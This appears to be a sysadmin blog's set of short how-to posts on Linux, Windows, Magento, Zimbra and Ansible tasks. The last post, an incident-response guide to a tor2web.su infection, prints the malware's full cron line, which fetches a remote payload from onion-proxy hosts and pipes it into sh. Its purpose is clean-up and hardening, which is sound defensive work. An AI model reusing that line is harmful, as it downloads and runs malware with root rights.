Categories
Uncategorized

Basic Packages for a fresh installed Ubuntu 16 / 18 / 19

sudo apt-get update
sudo apt-get install shutter vlc vim screen wget -y
wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb
sudo dpkg -i --force-depends google-chrome-stable_current_amd64.deb
sudo apt-get install -f
wget https://linux.palemoon.org/datastore/release/pminstaller-0.2.4.tar.bz2
bunzip2 pminstaller-0.2.4.tar.bz2
tar xvf pminstaller-0.2.4.tar
bash pminstaller.sh
rm -fr README pminstaller* google-chrome-stable_current_amd64.deb

 

Categories
Magento

Get BaseURLs from Database via CLI – Magento

Login to MySQL root or limited user, then use the database:-

use the-d2.com_db;

MariaDB > select * from core_config_data where path like '%base%url%';
+-----------+---------+----------+-----------------------------+------------------------------------------+
| config_id | scope | scope_id | path | value |
+-----------+---------+----------+-----------------------------+------------------------------------------+
| 52 | default | 0 | web/unsecure/base_url | https://www.the-d2.com/ |
| 53 | default | 0 | web/unsecure/base_link_url | {{unsecure_base_url}} |
| 54 | default | 0 | web/unsecure/base_skin_url | {{unsecure_base_url}}skin/ |
| 55 | default | 0 | web/unsecure/base_media_url | {{unsecure_base_url}}media/ |
| 56 | default | 0 | web/unsecure/base_js_url | {{unsecure_base_url}}js/ |
| 57 | default | 0 | web/secure/base_url | https://www.the-d2.com/ |
| 58 | default | 0 | web/secure/base_link_url | {{secure_base_url}} |
| 59 | default | 0 | web/secure/base_skin_url | https://the-d2.com/the-d2image/skin/ |
| 60 | default | 0 | web/secure/base_media_url | https://the-d2.com/the-d2image/media/ |
| 61 | default | 0 | web/secure/base_js_url | https://the-d2.com/the-d2image/js/ |
| 855 | default | 0 | system/mgt_base/feed_url | https://www.the-d2.com/feed |
+-----------+---------+----------+-----------------------------+------------------------------------------+
11 rows in set (0.00 sec)

 

Categories
Zimbra

[Solved] Zimbra – Unable to start TLS: SSL connect attempt failed error

Error while restarting zimbra/zmcontrol service

 

Starting ldap...Done.
Unable to start TLS: SSL connect attempt failed error:14090086:SSL routines:ssl3_get_server_certificate:certificate verify failed when connecting to ldap master.

Solution

su - zimbra
zmlocalconfig -e ldap_starttls_required=true
zmlocalconfig -e ldap_starttls_supported=1
zmcontrol restart

 

 

Categories
Ansible

Install MySQL 5.7 on CentOS via Ansible – Playbook .yml

---
- name: Install MySQL
  hosts: test123
  become: true
  remote_user: navdeepd2
  become_method: sudo
  gather_facts: true
  tasks:
    - name: "Installing Repo"
      shell: sudo rpm -Uvh http://dev.mysql.com/get/mysql57-community-release-el6-7.noarch.rpm
      ignore_errors: yes
    - name: "Installing MySQL 5.7"
      package: name=mysql-community-server state=present
    - name: Start the MySQL service
      become: true
      service: 
        name: mysqld
        state: started
        enabled: true
    - name: Find MySQL root password
      shell: "echo `grep 'temporary.*[email protected]' /var/log/mysqld.log | sed 's/.*[email protected]: //'`"
      register: mysql_root_pass
    - debug: var=mysql_root_pass.stdout

 

Categories
Powershell Scripts

Change Windows server RDP port via Powershell/CLI command

Open Powershell as Admin and run below command, change RDP port to 3400 or your choice in given command

Set-ItemProperty -Path "HKLM:System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" -Name PortNumber -Value 3400

 

Categories
Powershell Scripts

Disable Windows Server Update via Powershell/CLI

Create a file with notepad and paste below code, rename file as disable_update.ps1 then open Powershell as Admin then run it ./ps1

$WUSettings = (New-Object -com "Microsoft.Update.AutoUpdate").Settings
$WUSettings.NotificationLevel=1
$WUSettings.save()




$WindowsUpdatePath = "HKLM:SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\"
$AutoUpdatePath = "HKLM:SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU"

If(Test-Path -Path $WindowsUpdatePath) {
Remove-Item -Path $WindowsUpdatePath -Recurse
}

New-Item -Path $WindowsUpdatePath
New-Item -Path $AutoUpdatePath

Set-ItemProperty -Path $AutoUpdatePath -Name NoAutoUpdate -Value 1

 

 

Categories
Uncategorized

List of Processes consuming most of the RAM/Memory with ps command – Linux

This command will list the processes which are consuming most of the RAM. I am using ‘head -n 10‘ to list only top 10 memory intense process. You may remove it from the last.
Command:-

ps -eo size,pid,user,command --sort -size | awk '{ hr=$1/1024 ; printf("%13.2f Mb ",hr) } { for ( x=4 ; x<=NF ; x++ ) { printf("%s ",$x) } print "" }' | head -n 10

 

5312.29 Mb /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib64/mysql/plugin --user=mysql --log-error=/var/log/mysqld.log --pid-file=/var/lib/mysql/server.the-d2.com.pid --socket=/var/lib/mysql/mysql.sock
1060.39 Mb /usr/bin/node /home/the-d2/public_html/main.js
426.16 Mb /usr/bin/clamscan -
363.12 Mb memcached -d -p 11211 -u memcached -m 1024 -c 1024 -P /var/run/memcached/memcached.pid -l 127.0.0.1
223.23 Mb /sbin/rsyslogd -i /var/run/syslogd.pid -c 5
54.77 Mb /usr/libexec/webmin/virtual-server/lookup-domain-daemon.pl
23.51 Mb lfd - sleeping
16.94 Mb /usr/bin/php-cgi
16.25 Mb /usr/bin/perl /usr/libexec/webmin/miniserv.pl /etc/webmin/miniserv.conf
16.25 Mb /usr/bin/perl /usr/libexec/webmin/miniserv.pl /etc/webmin/miniserv.conf
16.25 Mb /usr/bin/perl /usr/libexec/webmin/miniserv.pl /etc/webmin/miniserv.conf
16.25 Mb /usr/bin/perl /usr/libexec/webmin/miniserv.pl /etc/webmin/miniserv.conf
16.25 Mb /usr/bin/perl /usr/libexec/webmin/miniserv.pl /etc/webmin/miniserv.conf
16.25 Mb /usr/bin/perl /usr/libexec/webmin/miniserv.pl /etc/webmin/miniserv.conf
16.11 Mb /usr/bin/perl /usr/libexec/webmin/miniserv.pl /etc/webmin/miniserv.conf

 

 

Memory intense process
High Memory consuming process

 

Categories
Uncategorized

WSUS and SUP – Windows Server Update Services / Software Update Point

WSUS:-
Windows Server Update Services (WSUS) enables information technology administrators to deploy the latest Microsoft product updates.

What it is ? >>> https://www.youtube.com/watch?v=LkeGluvR6C8

Install and Configure WSUS in Windows Server 2012 R2 > https://www.youtube.com/watch?v=Rb4Rl8VrP6U
=======

SUP:-
Software Update Point

What it is ? >> http://info.adaptivedge.com/blog/understanding-sccm-sup-process

Setup > https://www.youtube.com/watch?v=JeEjYUdhYEQ

Categories
Uncategorized

Huge waste disk space – Remove Multiple Old kernels worth 3GB (Total 116 packages)

But keep the current or latest one.

Reading state information… Done
The following packages will be REMOVED:
liblua5.1-0 linux-headers-4.10.0-38 linux-headers-4.10.0-38-generic linux-headers-4.10.0-40 linux-headers-4.10.0-40-generic linux-headers-4.10.0-42 linux-headers-4.10.0-42-generic
linux-headers-4.13.0-26 linux-headers-4.13.0-26-generic linux-headers-4.13.0-31 linux-headers-4.13.0-31-generic linux-headers-4.13.0-32 linux-headers-4.13.0-32-generic linux-headers-4.13.0-36
linux-headers-4.13.0-36-generic linux-headers-4.13.0-37 linux-headers-4.13.0-37-generic linux-headers-4.13.0-38 linux-headers-4.13.0-38-generic linux-headers-4.13.0-39 linux-headers-4.13.0-39-generic
linux-headers-4.13.0-41 linux-headers-4.13.0-41-generic linux-headers-4.13.0-43 linux-headers-4.13.0-43-generic linux-headers-4.13.0-45 linux-headers-4.13.0-45-generic linux-headers-4.15.0-24
linux-headers-4.15.0-24-generic linux-headers-4.15.0-29 linux-headers-4.15.0-29-generic linux-headers-4.15.0-30 linux-headers-4.15.0-30-generic linux-headers-4.15.0-32 linux-headers-4.15.0-32-generic
linux-headers-4.15.0-33 linux-headers-4.15.0-33-generic linux-headers-4.15.0-34 linux-headers-4.15.0-34-generic linux-headers-4.15.0-36 linux-headers-4.15.0-36-generic linux-headers-4.15.0-39
linux-headers-4.15.0-39-generic linux-headers-4.15.0-42 linux-headers-4.15.0-42-generic linux-headers-4.15.0-43 linux-headers-4.15.0-43-generic linux-headers-4.15.0-45 linux-headers-4.15.0-45-generic
linux-headers-4.15.0-46 linux-headers-4.15.0-46-generic linux-headers-4.15.0-47 linux-headers-4.15.0-47-generic linux-headers-4.15.0-50 linux-headers-4.15.0-50-generic linux-headers-4.15.0-52
linux-headers-4.15.0-52-generic linux-image-4.10.0-38-generic linux-image-4.10.0-40-generic linux-image-4.10.0-42-generic linux-image-4.13.0-26-generic linux-image-4.13.0-31-generic
linux-image-4.13.0-32-generic linux-image-4.13.0-36-generic linux-image-4.13.0-37-generic linux-image-4.13.0-38-generic linux-image-4.13.0-39-generic linux-image-4.13.0-41-generic
linux-image-4.13.0-43-generic linux-image-4.13.0-45-generic linux-image-4.15.0-24-generic linux-image-4.15.0-29-generic linux-image-4.15.0-30-generic linux-image-4.15.0-32-generic
linux-image-4.15.0-33-generic linux-image-4.15.0-34-generic linux-image-4.15.0-36-generic linux-image-4.15.0-39-generic linux-image-4.15.0-42-generic linux-image-4.15.0-43-generic
linux-image-4.15.0-45-generic linux-image-4.15.0-46-generic linux-image-4.15.0-47-generic linux-image-4.15.0-50-generic linux-image-4.15.0-52-generic linux-modules-4.15.0-24-generic
linux-modules-4.15.0-29-generic linux-modules-4.15.0-30-generic linux-modules-4.15.0-32-generic linux-modules-4.15.0-33-generic linux-modules-4.15.0-34-generic linux-modules-4.15.0-36-generic
linux-modules-4.15.0-39-generic linux-modules-4.15.0-42-generic linux-modules-4.15.0-43-generic linux-modules-4.15.0-45-generic linux-modules-4.15.0-46-generic linux-modules-4.15.0-47-generic
linux-modules-4.15.0-50-generic linux-modules-4.15.0-52-generic
0 upgraded, 0 newly installed, 100 to remove and 139 not upgraded.
After this operation, 4,462 MB disk space will be freed.
Do you want to continue? [Y/n]

[email protected]:~# dpkg -l | grep kernel
ii kmod 22-1ubuntu5 amd64 tools for managing Linux kernel modules
ii libaio1:amd64 0.3.110-2 amd64 Linux kernel AIO access library – shared library
ii libdrm2:amd64 2.4.76-1~ubuntu16.04.1 amd64 Userspace interface to kernel DRM services — runtime
ii linux-headers-4.10.0-38 4.10.0-38.42~16.04.1 all Header files related to Linux kernel version 4.10.0
ii linux-headers-4.10.0-38-generic 4.10.0-38.42~16.04.1 amd64 Linux kernel headers for version 4.10.0 on 64 bit x86 SMP
ii linux-headers-4.10.0-40 4.10.0-40.44~16.04.1 all Header files related to Linux kernel version 4.10.0
ii linux-headers-4.10.0-40-generic 4.10.0-40.44~16.04.1 amd64 Linux kernel headers for version 4.10.0 on 64 bit x86 SMP
ii linux-headers-4.10.0-42 4.10.0-42.46~16.04.1 all Header files related to Linux kernel version 4.10.0
ii linux-headers-4.10.0-42-generic 4.10.0-42.46~16.04.1 amd64 Linux kernel headers for version 4.10.0 on 64 bit x86 SMP
ii linux-headers-4.13.0-26 4.13.0-26.29~16.04.2 all Header files related to Linux kernel version 4.13.0
ii linux-headers-4.13.0-26-generic 4.13.0-26.29~16.04.2 amd64 Linux kernel headers for version 4.13.0 on 64 bit x86 SMP
ii linux-headers-4.13.0-31 4.13.0-31.34~16.04.1 all Header files related to Linux kernel version 4.13.0
ii linux-headers-4.13.0-31-generic 4.13.0-31.34~16.04.1 amd64 Linux kernel headers for version 4.13.0 on 64 bit x86 SMP
ii linux-headers-4.13.0-32 4.13.0-32.35~16.04.1 all Header files related to Linux kernel version 4.13.0
ii linux-headers-4.13.0-32-generic 4.13.0-32.35~16.04.1 amd64 Linux kernel headers for version 4.13.0 on 64 bit x86 SMP
ii linux-headers-4.13.0-36 4.13.0-36.40~16.04.1 all Header files related to Linux kernel version 4.13.0
ii linux-headers-4.13.0-36-generic 4.13.0-36.40~16.04.1 amd64 Linux kernel headers for version 4.13.0 on 64 bit x86 SMP
ii linux-headers-4.13.0-37 4.13.0-37.42~16.04.1 all Header files related to Linux kernel version 4.13.0
ii linux-headers-4.13.0-37-generic 4.13.0-37.42~16.04.1 amd64 Linux kernel headers for version 4.13.0 on 64 bit x86 SMP
ii linux-headers-4.13.0-38 4.13.0-38.43~16.04.1 all Header files related to Linux kernel version 4.13.0
ii linux-headers-4.13.0-38-generic 4.13.0-38.43~16.04.1 amd64 Linux kernel headers for version 4.13.0 on 64 bit x86 SMP
ii linux-headers-4.13.0-39 4.13.0-39.44~16.04.1 all Header files related to Linux kernel version 4.13.0
ii linux-headers-4.13.0-39-generic 4.13.0-39.44~16.04.1 amd64 Linux kernel headers for version 4.13.0 on 64 bit x86 SMP
ii linux-headers-4.13.0-41 4.13.0-41.46~16.04.1 all Header files related to Linux kernel version 4.13.0
ii linux-headers-4.13.0-41-generic 4.13.0-41.46~16.04.1 amd64 Linux kernel headers for version 4.13.0 on 64 bit x86 SMP
ii linux-headers-4.13.0-43 4.13.0-43.48~16.04.1 all Header files related to Linux kernel version 4.13.0
ii linux-headers-4.13.0-43-generic 4.13.0-43.48~16.04.1 amd64 Linux kernel headers for version 4.13.0 on 64 bit x86 SMP
ii linux-headers-4.13.0-45 4.13.0-45.50~16.04.1 all Header files related to Linux kernel version 4.13.0
ii linux-headers-4.13.0-45-generic 4.13.0-45.50~16.04.1 amd64 Linux kernel headers for version 4.13.0 on 64 bit x86 SMP
ii linux-headers-4.15.0-24 4.15.0-24.26~16.04.1 all Header files related to Linux kernel version 4.15.0
ii linux-headers-4.15.0-24-generic 4.15.0-24.26~16.04.1 amd64 Linux kernel headers for version 4.15.0 on 64 bit x86 SMP
ii linux-headers-4.15.0-29 4.15.0-29.31~16.04.1 all Header files related to Linux kernel version 4.15.0
ii linux-headers-4.15.0-29-generic 4.15.0-29.31~16.04.1 amd64 Linux kernel headers for version 4.15.0 on 64 bit x86 SMP
ii linux-headers-4.15.0-30 4.15.0-30.32~16.04.1 all Header files related to Linux kernel version 4.15.0
ii linux-headers-4.15.0-30-generic 4.15.0-30.32~16.04.1 amd64 Linux kernel headers for version 4.15.0 on 64 bit x86 SMP
ii linux-headers-4.15.0-32 4.15.0-32.35~16.04.1 all Header files related to Linux kernel version 4.15.0
ii linux-headers-4.15.0-32-generic 4.15.0-32.35~16.04.1 amd64 Linux kernel headers for version 4.15.0 on 64 bit x86 SMP
ii linux-headers-4.15.0-33 4.15.0-33.36~16.04.1 all Header files related to Linux kernel version 4.15.0
ii linux-headers-4.15.0-33-generic 4.15.0-33.36~16.04.1 amd64 Linux kernel headers for version 4.15.0 on 64 bit x86 SMP
ii linux-headers-4.15.0-34 4.15.0-34.37~16.04.1 all Header files related to Linux kernel version 4.15.0
ii linux-headers-4.15.0-34-generic 4.15.0-34.37~16.04.1 amd64 Linux kernel headers for version 4.15.0 on 64 bit x86 SMP
ii linux-headers-4.15.0-36 4.15.0-36.39~16.04.1 all Header files related to Linux kernel version 4.15.0
ii linux-headers-4.15.0-36-generic 4.15.0-36.39~16.04.1 amd64 Linux kernel headers for version 4.15.0 on 64 bit x86 SMP
ii linux-headers-4.15.0-39 4.15.0-39.42~16.04.1 all Header files related to Linux kernel version 4.15.0
ii linux-headers-4.15.0-39-generic 4.15.0-39.42~16.04.1 amd64 Linux kernel headers for version 4.15.0 on 64 bit x86 SMP
ii linux-headers-4.15.0-42 4.15.0-42.45~16.04.1 all Header files related to Linux kernel version 4.15.0
ii linux-headers-4.15.0-42-generic 4.15.0-42.45~16.04.1 amd64 Linux kernel headers for version 4.15.0 on 64 bit x86 SMP
ii linux-headers-4.15.0-43 4.15.0-43.46~16.04.1 all Header files related to Linux kernel version 4.15.0
ii linux-headers-4.15.0-43-generic 4.15.0-43.46~16.04.1 amd64 Linux kernel headers for version 4.15.0 on 64 bit x86 SMP
ii linux-headers-4.15.0-45 4.15.0-45.48~16.04.1 all Header files related to Linux kernel version 4.15.0
ii linux-headers-4.15.0-45-generic 4.15.0-45.48~16.04.1 amd64 Linux kernel headers for version 4.15.0 on 64 bit x86 SMP
ii linux-headers-4.15.0-46 4.15.0-46.49~16.04.1 all Header files related to Linux kernel version 4.15.0
ii linux-headers-4.15.0-46-generic 4.15.0-46.49~16.04.1 amd64 Linux kernel headers for version 4.15.0 on 64 bit x86 SMP
ii linux-headers-4.15.0-47 4.15.0-47.50~16.04.1 all Header files related to Linux kernel version 4.15.0
ii linux-headers-4.15.0-47-generic 4.15.0-47.50~16.04.1 amd64 Linux kernel headers for version 4.15.0 on 64 bit x86 SMP
ii linux-headers-4.15.0-50 4.15.0-50.54~16.04.1 all Header files related to Linux kernel version 4.15.0
ii linux-headers-4.15.0-50-generic 4.15.0-50.54~16.04.1 amd64 Linux kernel headers for version 4.15.0 on 64 bit x86 SMP
ii linux-headers-4.15.0-51 4.15.0-51.55~16.04.1 all Header files related to Linux kernel version 4.15.0
ii linux-headers-4.15.0-51-generic 4.15.0-51.55~16.04.1 amd64 Linux kernel headers for version 4.15.0 on 64 bit x86 SMP
ii linux-headers-4.15.0-52 4.15.0-52.56~16.04.1 all Header files related to Linux kernel version 4.15.0
ii linux-headers-4.15.0-52-generic 4.15.0-52.56~16.04.1 amd64 Linux kernel headers for version 4.15.0 on 64 bit x86 SMP
ii linux-headers-4.15.0-54 4.15.0-54.58~16.04.1 all Header files related to Linux kernel version 4.15.0
ii linux-headers-4.15.0-54-generic 4.15.0-54.58~16.04.1 amd64 Linux kernel headers for version 4.15.0 on 64 bit x86 SMP
ii linux-headers-4.15.0-55 4.15.0-55.60~16.04.2 all Header files related to Linux kernel version 4.15.0
ii linux-headers-4.15.0-55-generic 4.15.0-55.60~16.04.2 amd64 Linux kernel headers for version 4.15.0 on 64 bit x86 SMP
ii linux-headers-generic-hwe-16.04 4.15.0.55.76 amd64 Generic Linux kernel headers
ii linux-headers-virtual-hwe-16.04 4.15.0.55.76 amd64 Virtual Linux kernel headers
ii linux-image-4.10.0-38-generic 4.10.0-38.42~16.04.1 amd64 Linux kernel image for version 4.10.0 on 64 bit x86 SMP
ii linux-image-4.10.0-40-generic 4.10.0-40.44~16.04.1 amd64 Linux kernel image for version 4.10.0 on 64 bit x86 SMP
ii linux-image-4.10.0-42-generic 4.10.0-42.46~16.04.1 amd64 Linux kernel image for version 4.10.0 on 64 bit x86 SMP
ii linux-image-4.13.0-26-generic 4.13.0-26.29~16.04.2 amd64 Linux kernel image for version 4.13.0 on 64 bit x86 SMP
ii linux-image-4.13.0-31-generic 4.13.0-31.34~16.04.1 amd64 Linux kernel image for version 4.13.0 on 64 bit x86 SMP
ii linux-image-4.13.0-32-generic 4.13.0-32.35~16.04.1 amd64 Linux kernel image for version 4.13.0 on 64 bit x86 SMP
ii linux-image-4.13.0-36-generic 4.13.0-36.40~16.04.1 amd64 Linux kernel image for version 4.13.0 on 64 bit x86 SMP
ii linux-image-4.13.0-37-generic 4.13.0-37.42~16.04.1 amd64 Linux kernel image for version 4.13.0 on 64 bit x86 SMP
ii linux-image-4.13.0-38-generic 4.13.0-38.43~16.04.1 amd64 Linux kernel image for version 4.13.0 on 64 bit x86 SMP
ii linux-image-4.13.0-39-generic 4.13.0-39.44~16.04.1 amd64 Linux kernel image for version 4.13.0 on 64 bit x86 SMP
ii linux-image-4.13.0-41-generic 4.13.0-41.46~16.04.1 amd64 Linux kernel image for version 4.13.0 on 64 bit x86 SMP
ii linux-image-4.13.0-43-generic 4.13.0-43.48~16.04.1 amd64 Linux kernel image for version 4.13.0 on 64 bit x86 SMP
ii linux-image-4.13.0-45-generic 4.13.0-45.50~16.04.1 amd64 Linux kernel image for version 4.13.0 on 64 bit x86 SMP
ii linux-image-4.15.0-24-generic 4.15.0-24.26~16.04.1 amd64 Signed kernel image generic
ii linux-image-4.15.0-29-generic 4.15.0-29.31~16.04.1 amd64 Signed kernel image generic
ii linux-image-4.15.0-30-generic 4.15.0-30.32~16.04.1 amd64 Signed kernel image generic
ii linux-image-4.15.0-32-generic 4.15.0-32.35~16.04.1 amd64 Signed kernel image generic
ii linux-image-4.15.0-33-generic 4.15.0-33.36~16.04.1 amd64 Signed kernel image generic
ii linux-image-4.15.0-34-generic 4.15.0-34.37~16.04.1 amd64 Signed kernel image generic
ii linux-image-4.15.0-36-generic 4.15.0-36.39~16.04.1 amd64 Signed kernel image generic
ii linux-image-4.15.0-39-generic 4.15.0-39.42~16.04.1 amd64 Signed kernel image generic
ii linux-image-4.15.0-42-generic 4.15.0-42.45~16.04.1 amd64 Signed kernel image generic
ii linux-image-4.15.0-43-generic 4.15.0-43.46~16.04.1 amd64 Signed kernel image generic
ii linux-image-4.15.0-45-generic 4.15.0-45.48~16.04.1 amd64 Signed kernel image generic
ii linux-image-4.15.0-46-generic 4.15.0-46.49~16.04.1 amd64 Signed kernel image generic
ii linux-image-4.15.0-47-generic 4.15.0-47.50~16.04.1 amd64 Signed kernel image generic
ii linux-image-4.15.0-50-generic 4.15.0-50.54~16.04.1 amd64 Signed kernel image generic
ii linux-image-4.15.0-51-generic 4.15.0-51.55~16.04.1 amd64 Signed kernel image generic
ii linux-image-4.15.0-52-generic 4.15.0-52.56~16.04.1 amd64 Signed kernel image generic
ii linux-image-4.15.0-54-generic 4.15.0-54.58~16.04.1 amd64 Signed kernel image generic
ii linux-image-4.15.0-55-generic 4.15.0-55.60~16.04.2 amd64 Signed kernel image generic
ii linux-image-virtual-hwe-16.04 4.15.0.55.76 amd64 Virtual Linux kernel image
ii linux-modules-4.15.0-24-generic 4.15.0-24.26~16.04.1 amd64 Linux kernel extra modules for version 4.15.0 on 64 bit x86 SMP
ii linux-modules-4.15.0-29-generic 4.15.0-29.31~16.04.1 amd64 Linux kernel extra modules for version 4.15.0 on 64 bit x86 SMP
ii linux-modules-4.15.0-30-generic 4.15.0-30.32~16.04.1 amd64 Linux kernel extra modules for version 4.15.0 on 64 bit x86 SMP
ii linux-modules-4.15.0-32-generic 4.15.0-32.35~16.04.1 amd64 Linux kernel extra modules for version 4.15.0 on 64 bit x86 SMP
ii linux-modules-4.15.0-33-generic 4.15.0-33.36~16.04.1 amd64 Linux kernel extra modules for version 4.15.0 on 64 bit x86 SMP
ii linux-modules-4.15.0-34-generic 4.15.0-34.37~16.04.1 amd64 Linux kernel extra modules for version 4.15.0 on 64 bit x86 SMP
ii linux-modules-4.15.0-36-generic 4.15.0-36.39~16.04.1 amd64 Linux kernel extra modules for version 4.15.0 on 64 bit x86 SMP
ii linux-modules-4.15.0-39-generic 4.15.0-39.42~16.04.1 amd64 Linux kernel extra modules for version 4.15.0 on 64 bit x86 SMP
ii linux-modules-4.15.0-42-generic 4.15.0-42.45~16.04.1 amd64 Linux kernel extra modules for version 4.15.0 on 64 bit x86 SMP
ii linux-modules-4.15.0-43-generic 4.15.0-43.46~16.04.1 amd64 Linux kernel extra modules for version 4.15.0 on 64 bit x86 SMP
ii linux-modules-4.15.0-45-generic 4.15.0-45.48~16.04.1 amd64 Linux kernel extra modules for version 4.15.0 on 64 bit x86 SMP
ii linux-modules-4.15.0-46-generic 4.15.0-46.49~16.04.1 amd64 Linux kernel extra modules for version 4.15.0 on 64 bit x86 SMP
ii linux-modules-4.15.0-47-generic 4.15.0-47.50~16.04.1 amd64 Linux kernel extra modules for version 4.15.0 on 64 bit x86 SMP
ii linux-modules-4.15.0-50-generic 4.15.0-50.54~16.04.1 amd64 Linux kernel extra modules for version 4.15.0 on 64 bit x86 SMP
ii linux-modules-4.15.0-51-generic 4.15.0-51.55~16.04.1 amd64 Linux kernel extra modules for version 4.15.0 on 64 bit x86 SMP
ii linux-modules-4.15.0-52-generic 4.15.0-52.56~16.04.1 amd64 Linux kernel extra modules for version 4.15.0 on 64 bit x86 SMP
ii linux-modules-4.15.0-54-generic 4.15.0-54.58~16.04.1 amd64 Linux kernel extra modules for version 4.15.0 on 64 bit x86 SMP
ii linux-modules-4.15.0-55-generic 4.15.0-55.60~16.04.2 amd64 Linux kernel extra modules for version 4.15.0 on 64 bit x86 SMP
ii linux-virtual-hwe-16.04 4.15.0.55.76 amd64 Minimal Generic Linux kernel and headers
ii rsyslog 8.16.0-1ubuntu3 amd64 reliable system and kernel logging daemon
[email protected]:~#

Categories
Uncategorized

[Solved] an7kmd2wp4xo7hpr.tor2web.su Malicious Processes/Crons – Linux

1. Malicious Processes

A. Identify the processes and the its URL name, in below case its an7kmd2wp4xo7hpr.tor2web.su
B. Use command ps aux

root 26561 0.0 0.0 139556 4392 ? S Aug20 0:00 wget --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -O /etc/cron.monthly/cron
root 28777 0.0 0.0 139556 4384 ? S Aug21 0:00 wget --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -O /etc/cron.monthly/cron
root 24990 0.0 0.0 106076 1380 ? Ss 20:56 0:00 /bin/sh -c R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/d
root 24991 0.0 0.0 106076 1380 ? Ss 20:56 0:00 /bin/sh -c R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/d
root 24992 0.0 0.0 106076 1376 ? Ss 20:56 0:00 /bin/sh -c R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/d

2. Malicious Crons

A. Now use the same URL name and grep it in whole server
B. Command is below
[[email protected] ~]# grep -rli an7kmd2wp4xo7hpr    /
/etc/cron.d/root
/etc/cron.monthly/cronlog
/etc/crontab

[[email protected] ~]# cat /etc/cron.d/root
*/7 * * * * root R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ];then G1="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && G1="$f" && break;done;fi;G2="wget";if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ];then G2="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "to <[email protected]>" && G2="$f" && break;done;fi;if [ $(cat /etc/hosts|grep -i "onion.\|timesync.su\|tor2web"|wc -l) -ne 0 ];then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1;fi; C=" -fsSLk --connect-timeout 26 --max-time 75 ";W=" --quiet --tries=1 --no-check-certificate --connect-timeout=26 --timeout=75 ";H="https://an7kmd2wp4xo7hpr";T1=".tor2web.su/";T2=".d2web.org/";T3=".onion.sh/";P="src/ldm";($G1 $C $H$T1$P||$G1 $C $H$T2$P||$G1 $C $H$T3$P||$G2 $W $H$T1$P||$G2 $W $H$T2$P||$G2 $W $H$T3$P)|sh &

[[email protected] ~]# cat /etc/crontab
*/7 * * * * root R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ];then G1="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && G1="$f" && break;done;fi;G2="wget";if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ];then G2="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "to <[email protected]>" && G2="$f" && break;done;fi;if [ $(cat /etc/hosts|grep -i "onion.\|timesync.su\|tor2web"|wc -l) -ne 0 ];then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1;fi; C=" -fsSLk --connect-timeout 26 --max-time 75 ";W=" --quiet --tries=1 --no-check-certificate --connect-timeout=26 --timeout=75 ";H="https://an7kmd2wp4xo7hpr";T1=".tor2web.su/";T2=".d2web.org/";T3=".onion.sh/";P="src/ldm";($G1 $C $H$T1$P||$G1 $C $H$T2$P||$G1 $C $H$T3$P||$G2 $W $H$T1$P||$G2 $W $H$T2$P||$G2 $W $H$T3$P)|sh &

 

Solutions:-

A. Remove the malicious codes from crons or wherever you find and for the time being, put chattr on them as well
B. chattr +i /etc/cron.d/root ; chattr +i /etc/crontab
C.
- Change root password instantly
- Remove all Authorized keys from all users which is not yours

ls -lahd /home/*/.ssh/auth*
ls -lahd /root/.ssh/auth*

- ClamAV - Antivirus
- Maldet - Malware Detector
- Restricting SSH from particular IPs/VPN
- Restricting MySQL from particular IPs/VPN
- CSF Firewall
- LFD Login Failure Daemon
- WAF Web Application Firewall
- ModSecurity with HTTP/Apache
- Avoid using MySQL root user pass in Application code and create a non root mysql user.
- Proper permissions and ownership of code files like of 755 for dirs and 644 for files.
- Non standard SSH port